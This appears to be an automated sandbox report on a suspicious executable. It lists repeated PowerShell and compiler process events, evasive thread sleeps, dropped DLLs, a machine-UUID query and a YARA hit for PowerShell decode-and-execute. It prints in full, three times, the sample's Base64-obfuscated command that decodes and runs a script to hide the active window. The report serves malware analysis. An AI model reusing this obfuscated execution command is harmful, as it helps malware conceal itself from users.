      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5427Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4374Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6291
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2485
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dllJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep count: 5427 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 4374 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -8301034833169293s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep count: 6291 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep count: 2485 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360315901.00000163915A0000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2342171678.00000163915A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell decode and execute
      Source: Yara matchFile source: amsi64_5652.amsi.csv, type: OTHER
      Source: Yara matchFile source: amsi64_764.amsi.csv, type: OTHER
      Encrypted powershell cmdline option found
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' | ConvertFrom-Json).Script)) | iex
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' | ConvertFrom-Json).Script)) | iex
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' | ConvertFrom-Json).Script)) | iexJump to behavior
